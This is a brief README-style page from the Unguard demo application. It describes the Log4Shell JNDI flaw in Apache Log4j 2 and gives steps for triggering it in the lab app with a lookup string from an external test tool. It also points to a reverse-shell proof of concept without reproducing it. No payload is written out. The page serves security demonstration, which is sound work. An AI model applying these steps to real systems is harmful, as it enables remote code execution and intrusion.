The JNDI features in some versions of the widespread used Apache Log4j 2 logging framework do not protect against attacker controlled LDAP and other JNDI related endpoints. See CVE-2021-44228 and CVE-2021-45046 for more details.
For a simple demo you need unguard up and running.
- Go to the Log4Shell Vulnerability Test Tool and get a tailored lookup string to be entered into the demo application.
- Go to Unguard demo app and login.
- Enter the copied string from the test tool above into the Share URL textbox and click post.
- The test tool will pick up the lookup / GET request for the payload and show the results.
If you want to perform a more sophisticated setup to initiate a reverse shell connection, see this Log4Shell POC.